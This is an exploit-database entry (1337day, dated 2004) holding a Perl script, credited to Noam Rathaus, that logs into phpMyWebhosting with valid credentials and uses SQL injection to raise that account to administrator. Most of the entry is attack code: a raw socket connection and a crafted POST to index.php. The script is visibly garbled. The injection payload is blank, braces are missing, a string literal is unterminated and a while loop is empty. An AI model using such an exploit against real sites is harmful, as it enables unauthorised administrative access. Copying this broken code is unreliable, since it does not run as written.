phpMyWebhosting SQL Injection Exploit

ID 1337DAY-ID-30
Type zdt
Reporter Noam Rathaus
Modified 2004-08-20T00:00:00


Exploit for unknown platform in category web applications

phpMyWebhosting SQL Injection Exploit 

# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password 
combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the 
user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
print "You must run the script with the following syntax:\n";
print $0." hostname path username password\n";

my $remote = IO::Socket::INET->new (  Proto => "tcp", PeerAddr => $Host, 
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";


my $http = "POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = 

$http .= length($content)."


print "HTTP: [$http]\n";
print $remote $http;
print "Sent\n";

while ()
print $_;
print "\n";

close $remote;

# [2018-03-31]  #